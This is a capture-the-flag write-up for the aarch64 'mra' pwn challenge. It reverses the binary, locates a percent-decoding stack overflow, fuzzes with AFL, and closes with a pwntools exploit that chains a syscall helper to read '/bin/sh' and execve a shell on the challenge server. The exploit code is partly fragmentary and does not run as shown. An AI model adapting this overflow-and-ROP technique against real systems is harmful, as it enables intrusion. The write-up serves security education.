Rating:

# mra: pwn/rev
(sorry for the formatting, it looks a lot better at the original link here: (https://github.com/b01lers/b01lers-library/blob/master/2021OOO/pwn/mra/solve.md)
Files for this challenge are attached in the directory.

## Initial Analysis

So we get a binary called mra. First things first, some standard checklist items:


❯ file mra
mra: ELF 64-bit LSB executable, ARM aarch64, version 1 (SYSV), statically linked, stripped


Ok, aarch64. It's also statically linked, so we won't be doing any ret2libc here.


❯ checksec mra
[*] '/home/novafacing/hub/b01lers-library/2021OOO/pwn/mra/mra'
Arch: aarch64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)


So we have no canary and no PIE, but NX on. No shellcoding, most likely we're going to need to ROP to succeed here. Of course, I haven't opened the binary at this point so that's just conjecture ;)

I started working on this challenge in Ghidra, but had a pretty rough time exploring the disassembly (we'll see why shortly). I ended up switching to [cutter](https://cutter.re) late in the competition with *much* more success. I won't include any of my Ghidra snips here, but they happened and I did use Ghidra to identify all of the library functions before switching over during the "what the heck is the actual exploit here" stage.

As usual, we want to start by finding main. Luckily here that's pretty easy, it'll be the first argument to __libc_start_main in entry0 (called entry by Ghidra). Jump in there and we see that main is at 0x40033c. For whatever reason, cutter had some issues identifying xrefs to main. I couldn't figure out why, but I already knew where it was thanks to Ghidra, so this didn't hold me up.

In main, we'll see several function calls. I'll briefly explain what made me guess each one (I ended up being 100% right!).

1. fcn.00401018(**(int64_t **)0x41cf80, 0, 2, 0); clearly this is setvbuf. lol.
2. fcn.00405ba0 you can either guess from params or just look at [the source](https://github.com/bminor/glibc/blob/3cc4a8367c23582b7db14cf4e150e4068b7fd461/string/memset.c) that this is definitely memset with all its weird optimized copies. Never change, glibc. No seriously, don't change or these challenges will be much harder.
3. uStack28 = fcn.004064f8(0, (int64_t)auStack1128, 0x3ff); This one is a little trickier. If we click into it, we'll see this is basically a wrapper for fcn.00408624 which in turn wraps fcn.00408588:

asm
fcn.00408684 (int64_t arg1, int64_t arg2, int64_t arg3, int64_t arg4);
; arg int64_t arg1 @ x0
; arg int64_t arg2 @ x1
; arg int64_t arg3 @ x2
; arg int64_t arg4 @ x3
0x00408688 stur x0, [sp, -8] ; arg1
0x0040868c stur x1, [sp, -0x10] ; arg2
0x00408690 stur x2, [sp, -0x18] ; arg3
0x00408694 stur x3, [sp, -0x20] ; arg4
0x00408698 ldur x8, [sp, -8] ; 8
0x0040869c ldur x0, [sp, -0x10] ; 16
0x004086a0 ldur x1, [sp, -0x18] ; 24
0x004086a4 ldur x2, [sp, -0x20] ; 0x178000
;-- syscall.0.9:
0x004086a8 svc 0
0x004086ac sub sp, sp, 0x20
0x004086b0 ret

Here is where I learned that syscalls in aarch64 are mercifully pretty simple. They're all listed by syscall number in [the ~~bible~~ source](https://github.com/torvalds/linux/blob/master/include/uapi/asm-generic/unistd.h). We know that this one is syscall #0x37 from the outer function (syscall number is passed in x8 on aarch64 so when we see fcn.00408624(0x3f, (int64_t)iStack000000000000002c, arg2, arg3, 0, 0, 0); we'll know pretty well this is a read syscall. So, we can just call that outer function read (it's the libc wrapper for the syscall).

4. fcn.00405eb0((int64_t)auStack1128, (int64_t)pcStack16, 0xf) pcStack16 = "GET /api/isodd/" is right up above here, and is 0xf characters long. Doesn't take a super genius to realize this is strncmp.
5. If we look at the arguments to fcn.00405ca8, we come up with the list 0xa (n), 0x3f (?), 0x2f (/). These are all pretty reasonable things to, well, strchr for in a URL. You could try and reverse it but...simiarly optimized to memset and pretty gross.
6. Similar deal with fcn.00406358, the args tell us this is *almost certainly* strstr.
7. Similarly to strcmp, we can check strcmp pretty easily by just looking at the args and checking the code quickly to see that we return the difference of two pointers inside the string. This is pretty indicative of strcmp behavior.
8. sprintf is located at 0x400d88, and once again we can basically tell this by the args. We can also stop our debugger there and see that yes, the buffer gets copied into. Easy!

There are also puts and printf at 0x400f14 and 0x400e4c, respectively. The exploit happens before these calls though. Anyway, if we put in all these calls, it becomes pretty clear that the program expects an input format of something like GET /api/isodd/(0-9)+?token=(enterprise|premium|public). We can try some inputs, the answer comes back right! But where's the bug?

There are a couple functions I haven't mentioned yet. That's because it's time for our next section:

## Finding the Bug!

This is a pwn challenge, and therefore there must be a bug (or a few, but in this case there is basically just one). The function at 0x4001d0, which I called helper_with_copy has some gross looking C code in Ghidra, but I retyped it out:

c
int32 fun_4001d0(char * output, char * input) {
int in_index = 0;
int out_index = 0;
char cur = input;

while ((cur = input[in_index]) != 0) {
if (cur == '%') {
char temp = hex_to_dec(input[in_index + 1];)
cur = hex_to_dec(input[in_index + 2]);
cur = tmp & 0xff << 4 | cur; // Make 8 bit value from %0f hex
in_index += 3;
} else {
in_index++;
}
output[out_index] = cur;
out_index++;
}
return out_index;
}


This gets called with two arguments. Argument 0 is where we copy *to* and argument 1 is where we copy *from*, which ends up being (with a normal input) the number we want to test is odd or not. We're gonna get around that a bit. The output is a stack buffer that I'm honestly still not sure the size of, but it's not big enough. Basically what happens is we're just going to keep going while the current character of the input is not 0. So...if we want to overflow, save your nullbytes! Helpfully, the authors also convert any strings like %0f to an actual integer value and save it to the output. Neat! That happens with this code:

c
char hex_to_dec(int64_t inp)
{
uint8_t _inp;
char reg;
_inp = (uint8_t)inp;
// if not 0-9:
if ((_inp < 0x30) || (0x39 < _inp)) {
// if not a-f
if ((_inp < 0x61) || (0x66 < _inp)) {
// if not A-F
if ((_inp < 0x41) || (0x46 < _inp)) {
// If we are not 0-9, not a-f, and not A-F, set to 0
reg = '0';
} else {
// We are A-F, subtract 0x37 (0x41-0x37 == 10)
reg = _inp - 0x37;
}
} else {
// We are a-f, add 0xa9 ('a' + 0xa9 % 256 = 10)
reg = _inp + 0xa9;
}
} else {
// If it is 0-9, we convert to the integer 0-9
reg = _inp - 0x30;
}
return reg;
}


If you're thinking "hey, that's pretty suspicious!", you're right. I thought so too, but I didn't really want to mess around too much to figure out exactly how to exploit this, so I turned to my friend AFL (specifically [AFL-Other-Arch](https://github.com/shellphish/afl-other-arch)). I used AFL with the following test cases:


GET /api/isodd/1234567890?token=enterprise
GET /api/isodd/1?token=public
GET /api/isodd/3?token=enterprise
GET HTTP /api/isodd/%01%ff%ab%ce?token=enterprise
GET /api/isodd/999999?token=public
GET /api/isodd/999999999999?token=enterprise


Then I just ran it with afl-fuzz -Q -i ./testcases -o ./outputs -- ./mra and let it get to work. Within 20 minutes it had found a few thousand crashes, so I figured it was probably time to figure out which ones were worth using. Basically, I figured that I know there's a buffer overflow, so we can reasonably expect $pc control from a good exploit. So I filtered the results for just that using this script: python from pwn import * from subprocess import run, PIPE from pathlib import Path import re from binascii import hexlify PC_REG = r"$$void \(\*$$\) (0x[0-9a-f]+)" BT_REG = r"0x[0-9a-f]{16}" SRCTEMPLATE = """target remote localhost:{} c p$pc
bt
q"""

# Too many open files thanks OSError -_-
files = []
procs = []

testcases = Path("outputs2/crashes")
#
for portbase, testcase in enumerate(testcases.iterdir()):
# Again...just to make sure the file descriptors close
for f in files:
try:
f.close()
except:
pass
for f in procs:
try:
f.kill()
except:
pass

files = []
procs = []

tc = testcase
port = portbase + 10000
# Open our actual testcase file
with open(tc, "rb") as tcc:
files.append(tcc)
# Start a qemu debug process
r = process(["qemu-aarch64-static", "-g", str(port), "./mra"])
procs.append(r)
print(content)
try:
# Send the testcase to the process
r.sendline(content)
except:
continue
with open("gdbscript.gdb", "w") as srcfile:
srcfile.write(SRCTEMPLATE.format(port))
try:
# Try and attach to the process and run the debugger script to collect the info
proc = subprocess.run(["gdb-multiarch", "-q", "-x", "gdbscript.gdb"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, timeout=5)
op = proc.stdout
except:
try:
proc.kill()
r.close()
except:
pass
continue

# Print out the crashes, backtrace
print("CRASHES========================")
found_crashes = re.findall(PC_REG, op.decode("utf-8", errors="ignore"))
print(found_crashes)
print("BT=============================")
backtrace = re.findall(BT_REG, op.decode("utf-8", errors="ignore"))
print(backtrace)
print("===============================")

# STUPID BAD AND DUMB HEURISTIC for seeing if we control $pc hinput = hexlify(content) for f in found_crashes: check = bytes(hex(int(f, 16))[2:], "utf-8") print("==========CHECK: ", check, " IN ", hinput) if check in hinput: with open("goodcandidate.txt", "wb") as goods: goods.write(content) goods.write("\n==DONE==\n") goods.write(bytes(str(found_crashes), "utf-8")) goods.write(bytes(str(backtrace), "utf-8")) for f in found_crashes: check = bytes(hex(int(f, 16))[2:], "utf-8") if check in hinput: with open("goodcandidate.txt", "rb") as goods: goods.write(content) goods.write("\n==DONE==\n") goods.write(bytes(str(found_crashes), "utf-8")) goods.write(bytes(str(backtrace), "utf-8")) try: r.recv(timeout=2) except: pass try: proc.kill() r.close() except: pass  Now, is this overkill? Probably. Did it work? Also yes. Really you could have just not put a question mark or newline until the end of your input and it would also work. But this is a pretty fun way to solve. This script will write any inputs that successfully cause $pc to be part of the input (a bad heuristic in the general case but who cares) to the goodcandidates.txt file.

Anyway, I got a good candidate from one of my testcases:


GET /api/isodd/1234%8934%pris%d4444444>444444444444M444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444444pris444444444444444444444444444444444444444444444444444444444444444444444isodd/444444!444444444444444444444444444444444444444api/444444444444444444444444444444F4444444444444@44444444444444444444444444444????pris?34%%%%%'%%%B4


Okay. So to validate this, I just plugged it into gdb and ran it normally, then printed out the stack around it with x/20xg $sp. Oops, all '4'! Now is when I looked up some good arch64 ROP writeups [^1], got a little freaked out by the fact that aarch64 actually doesn't return to the whatever is top of the stack (because of course it doesn't). Instead, it rets to x30. Great. But the page got me somewhere: I knew I didn't want to mess around with having a bunch of gadgets. That's fine, because if you take a look at where nullbytes get placed due to read sizes, you'll realize we get a max of 5 gadgets anyway (I use 2 but "gadget" is a generous term). I replaced the '4' string with a pwntools.cyclic.cyclic string to figure out exactly where I needed to stick my payload, and got started crafting an exploit. I decided to not bother trying to rop to syscall or anything like that, because we're statically linked and we already have helper functions that call syscalls with our arguments, AND they take the syscall arguments from the stack for us. And we control the stack. It's extremely simple to get going. The key is this block: asm 0x004085a8 ldur x8, [sp, -8] ; 8 0x004085ac ldur x0, [sp, -0x10] ; 16 0x004085b0 ldur x1, [sp, -0x18] ; 24 0x004085b4 ldur x2, [sp, -0x20] ; 32 0x004085b8 ldur x3, [sp, -0x28] ; 40 0x004085bc ldur x4, [sp, -0x30] ; 48 0x004085c0 ldur x5, [sp, -0x38] ; 56 0x004085c4 svc 0 0x004085c8 sub sp, sp, 0x40 0x004085cc ret  What this does is it just loads the first 7 things starting from $sp-8 into registers (first one being the syscall number) and executes a svc which is a supervisor call (basically equivalent to int 0x80 or syscall on x86_64). We control everything on the stack up to this point, so we can leverage this to execute any syscall we want with any arguments. Naturally, I'll do execve("/bin/sh\x00", NULL, NULL);. We have a problem though, I don't have a stack leak (and can't get one), and I still need that first argument in x0 to be a pointer to /bin/sh\x00. My solution to this is to execute two syscalls:

1. read into an area in .data with a particular address (thanks no-pie!) the string /bin/sh\x00.
2. execve now with the first argument as that pointer.

Notice that sub sp, sp, 0x40 at the beginning? That's problematic, because I don't have arbitrary data in that location, so I wouldn't be able to get my args into execve after the first call. The solution: just run the read glibc wrapper function from the beginning instead! It already provides everything but the buffer to read into for us. From there, the rest is trivial, and the final script looks like this:

python
from pwn import *

context.arch = "arm"
context.bits = 64

portbase = 1
port = portbase + 10000

# converts an int like 0x400 to a properly setup string like %00%04%00%00%00%%00%00%00
# Remember when I said the authors were nice?
new = list(map(lambda l: b"%" + l.rjust(2, b"0"), reversed(sep)))
while len(new) < 8:
new.append(b"%00")
return b"".join(new)

pad += a2pp(0xdd) # syscall num for execve
pad += a2pp(0x004085a8) # sp - 8 -> sp - 0x38 -> regs x8, 0,1,2,3,4,5 && syscall
pad += a2pp(0x9) # 9 bytes to read, length of binsh + newline (so could be 8 I guess)
# Ugly because it's just from the fuzzer and I didn't really change anything. lol
content = b"GET /api/isodd/1236%\x00\x008936%pris%d6666666>" + xrep + b"VVVV/666666!666666666666666666666666666666666666666api/666666666666666666666666666666F6666666666666@66666666666666666666666666666\x15????pris?\x16\x1636%\x00%%%%'%\x7f%%B6\x03"

# This isn't really necessary
content += b"1" * (0x3ff - len(content))

r = remote("mra.challenges.ooo", 8000)
print()
print("Sending ", content)
r.send(content)
r.sendline(b"/bin/sh\x00")
# Shell!
r.interactive()


[^1]: [Perfect Blue's Excellent aarch64 ROP writeup](https://web.archive.org/web/20210503022008/https://blog.perfect.blue/ROPing-on-Aarch64) because I didn't know a whole lot about aarch64 pwn.

Original writeup (https://github.com/b01lers/b01lers-library/blob/master/2021OOO/pwn/mra/solve.md).